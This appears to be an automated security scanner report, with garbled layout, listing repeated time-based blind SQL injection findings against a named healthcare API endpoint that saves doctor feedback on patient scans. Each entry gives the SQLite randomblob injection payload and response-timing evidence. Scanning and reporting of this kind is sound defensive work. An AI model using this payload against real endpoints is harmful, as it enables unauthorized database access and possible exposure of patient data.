The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,561] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the

Info request to take [3,990] milliseconds, when the original unmodified query with value [230]

took [1,285] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback URL

Method **POST**

Other Info

Evidence

Method

Evidence

Other Info

Method

Attack

Evidence

Other Info

Evidence

Other

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,585] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,358] milliseconds, when the original unmodified query with value [222]

took [777] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,585] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,358] milliseconds, when the original unmodified query with value [222]

took [777] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,607] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,684] milliseconds, when the original unmodified query with value [208]

took [265] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,607] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,684] milliseconds, when the original unmodified query with value [208] took [265] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,653] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,778] milliseconds, when the original unmodified query with value [217]

took [262] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,653] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,778] milliseconds, when the original unmodified query with value [217]

took [262] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,774] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,797] milliseconds, when the original unmodified query with value [237]

took [783] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,774] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,797] milliseconds, when the original unmodified query with value [237] took [783] milliseconds.

https://api.velmeni.ai/api/patient/scan/save doctor feedback

Other

Info

Evidence

Evidence

Other Info

URL

Evidence

Other Info

Attack

Evidence

Other Info

URL

Method **POST**

Evidence

Other

Info

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,782] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,696] milliseconds, when the original unmodified query with value [186]

took [480] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,782] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,696] milliseconds, when the original unmodified query with value [186]

took [480] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,785] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [6,741] milliseconds, when the original unmodified query with value [210]

took [1,192] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,785] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [6,741] milliseconds, when the original unmodified query with value [210]

took [1,192] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,796] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,342] milliseconds, when the original unmodified query with value [183]

took [1,557] milliseconds.

took [1,557] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,796] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,342] milliseconds, when the original unmodified query with value [183]

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,813] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,452] milliseconds, when the original unmodified query with value [164]

took [1,396] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,813] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,452] milliseconds, when the original unmodified query with value [164]

took [1,396] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end

Other

Info

Evidence

Method

Attack

Evidence

Other Info

URL

Evidence

Other Info

Attack

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,822] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,878] milliseconds, when the original unmodified guery with value [213] took [1,069] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,822] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,878] milliseconds, when the original unmodified query with value [213] took [1,069] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,913] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [5,631] milliseconds, when the original unmodified query with value [237] took [778] milliseconds.

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,913] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [5,631] milliseconds, when the original unmodified query with value [237] took [778] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,952] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,288] milliseconds, when the original unmodified query with value [147] took [1,132] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [1,952] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,288] milliseconds, when the original unmodified query with value [147] took [1,132] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,013] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,912] milliseconds, when the original unmodified guery with value [73] took

[762] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,013] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,912] milliseconds, when the original unmodified query with value [73] took [762] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,024] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the

Evidence

Other Info

Evidence

Other Info

URL

Evidence

URL

request to take [2,568] milliseconds, when the original unmodified guery with value [198] took [1,049] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,024] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,568] milliseconds, when the original unmodified query with value [198]

took [1,049] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,037] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,510] milliseconds, when the original unmodified guery with value [724]

took [262] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,037] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,510] milliseconds, when the original unmodified query with value [724] took [262] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback **URL**

POST Method

case randomblob(100000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,068] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,842] milliseconds, when the original unmodified query with value

[312.13463469860596] took [315] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,068] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,842] milliseconds, when the original unmodified query with value [312.13463469860596] took [315] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

URL

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,075] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,898] milliseconds, when the original unmodified query with value [15] took

[1,577] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,075] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,898] milliseconds, when the original unmodified query with value [15] took [1,577] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,076] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,092] milliseconds, when the original unmodified query with value [222]

took [1,867] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not

Other Info

Evidence

Other

Info

Evidence

Other

Info

Evidence

Other Info

URL

Other Info

null then 1 else 1 end], which caused the request to take [2,076] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3.092] milliseconds, when the original unmodified query with value [222]

took [1,867] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,092] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,202] milliseconds, when the original unmodified query with value [217]

took [1,540] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,092] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,202] milliseconds, when the original unmodified query with value [217] took [1,540] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,176] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,263] milliseconds, when the original unmodified query with value [173]

took [1,267] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,176] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,263] milliseconds, when the original unmodified query with value [173] took [1,267] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,192] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [6,361] milliseconds, when the original unmodified query with value [166] took [1,917] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,192] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [6.361] milliseconds, when the original unmodified query with value [166] took [1,917] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,287] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,986] milliseconds, when the original unmodified query with value [234] took [787] milliseconds.

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,287] milliseconds, parameter

Other

value [case randomblob(1000000) when not null then 1 else 1 end], which caused the Info

request to take [2,986] milliseconds, when the original unmodified query with value [234]

took [787] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Evidence

Other

Evidence

Other

Evidence

Other

Evidence

Other

Info

Info

URL

Info

Info

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,315] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,996] milliseconds, when the original unmodified query with value [252]

took [2,197] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,315] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,996] milliseconds, when the original unmodified query with value [252]

took [2,197] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,343] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,567] milliseconds, when the original unmodified guery with value [276]

took [2,313] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,343] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,567] milliseconds, when the original unmodified guery with value [276]

took [2,313] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,407] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,259] milliseconds, when the original unmodified query with value [244] took [1,388] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,407] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,259] milliseconds, when the original unmodified query with value [244] took [1,388] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,438] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,110] milliseconds, when the original unmodified query with value [32] took

[2,433] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,438] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,110] milliseconds, when the original unmodified query with value [32] took

[2,433] milliseconds.

https://api.velmeni.ai/api/patient/scan/save doctor feedback **URL**

Method **POST** Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,577] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,158] milliseconds, when the original unmodified query with value [193]

took [2,113] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,577] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,158] milliseconds, when the original unmodified query with value [193]

took [2,113] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(100000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,654] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,943] milliseconds, when the original unmodified query with value [171]

took [266] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,654] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,943] milliseconds, when the original unmodified guery with value [171]

took [266] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,662] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,532] milliseconds, when the original unmodified query with value [279]

took [1,233] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,662] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,532] milliseconds, when the original unmodified query with value [279]

took [1,233] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,665] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [6,398] milliseconds, when the original unmodified query with value [242]

took [2,460] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,665] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [6,398] milliseconds, when the original unmodified query with value [242]

took [2,460] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save doctor feedback

POST Method

Attack

case randomblob(100000) when not null then 1 else 1 end

Other Info

Evidence

Method

Evidence

Other

Info

Evidence

Other Info

Evidence

Other Info

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,668] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,663] milliseconds, when the original unmodified query with value [232] took [1,551] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,668] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,663] milliseconds, when the original unmodified query with value [232] took [1,551] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,753] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,476] milliseconds, when the original unmodified guery with value [166] took [668] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,753] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,476] milliseconds, when the original unmodified query with value [166] took [668] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,784] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,232] milliseconds, when the original unmodified query with value [171] took [1,286] milliseconds.

Other Info

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,784] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,232] milliseconds, when the original unmodified query with value [171] took [1,286] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,809] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [5,552] milliseconds, when the original unmodified query with value [191]

took [1,535] milliseconds.

Other Info

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,809] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [5,552] milliseconds, when the original unmodified query with value [191] took [1,535] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,911] milliseconds, parameter

Evidence

value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,591] milliseconds, when the original unmodified query with value [215] took [772] milliseconds.

Other Info The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [2,911] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,591] milliseconds, when the original unmodified query with value [215] took [772] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [3,184] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,823] milliseconds, when the original unmodified query with value [193] took [1,550] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [3,184] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,823] milliseconds, when the original unmodified query with value [193] took [1,550] milliseconds.

Other Info

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method

POST

Attack

case randomblob(100000) when not null then 1 else 1 end

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [3,301] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,660] milliseconds, when the original unmodified query with value [237] took [1,514] milliseconds.

Other Info

URL

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [3,301] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [4,660] milliseconds, when the original unmodified query with value [237] took [1,514] milliseconds.

Method POST

Attack case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [3,631] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,793] milliseconds, when the original unmodified query with value [220]

took [1,667] milliseconds.

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [3,631] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,793] milliseconds, when the original unmodified query with value [220] took [1,667] milliseconds.

URL

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method POST

Attack case randomblob(100000) when not null then 1 else 1 end

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [4,268] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [5,341] milliseconds, when the original unmodified query with value [190]

took [1,991] milliseconds.

Other Info

Evidence

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [4,268] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [5,341] milliseconds, when the original unmodified query with value [190] took [1,991] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [764] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,920] milliseconds, when the original unmodified guery with value [64] took

[259] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [764] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [2,920] milliseconds, when the original unmodified query with value [64] took

[259] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [765] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,002] milliseconds, when the original unmodified guery with value [232]

took [259] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [765] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,002] milliseconds, when the original unmodified query with value [232]

took [259] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST

case randomblob(100000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [778] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,928] milliseconds, when the original unmodified query with value [200]

took [550] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [778] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [3,928] milliseconds, when the original unmodified query with value [200]

took [550] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [779] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,236] milliseconds, when the original unmodified query with value [584]

took [262] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [779] milliseconds, parameter

Other value [case randomblob(1000000) when not null then 1 else 1 end], which caused the

Info request to take [1,236] milliseconds, when the original unmodified query with value [584]

took [262] milliseconds.

https://api.velmeni.ai/api/patient/scan/save_doctor_feedback URL

POST Method

Other Info

Evidence

Method

Evidence

Other Info

Method

Attack

Evidence

Other Info

Attack

Attack case randomblob(100000) when not null then 1 else 1 end

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [784] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,747] milliseconds, when the original unmodified query with value [12] took

[783] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [784] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,747] milliseconds, when the original unmodified query with value [12] took

[783] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

Method **POST**

case randomblob(100000) when not null then 1 else 1 end Attack

> The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [790] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [960] milliseconds, when the original unmodified query with value

[323.5856150907629] took [261] milliseconds.

The query time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [790] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [960] milliseconds, when the original unmodified guery with value

[323.5856150907629] took [261] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

case randomblob(100000) when not null then 1 else 1 end Attack

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [801] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,268] milliseconds, when the original unmodified query with value [1010]

took [773] milliseconds.

The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [801] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [1,268] milliseconds, when the original unmodified query with value [1010]

took [773] milliseconds.

URL https://api.velmeni.ai/api/patient/scan/save_doctor_feedback

POST Method

Attack case randomblob(100000) when not null then 1 else 1 end

> The guery time is controllable using parameter value [case randomblob(100000) when not null then 1 else 1 end], which caused the request to take [806] milliseconds, parameter value [case randomblob(1000000) when not null then 1 else 1 end], which caused the request to take [960] milliseconds, when the original unmodified query with value [200] took

[771] milliseconds.

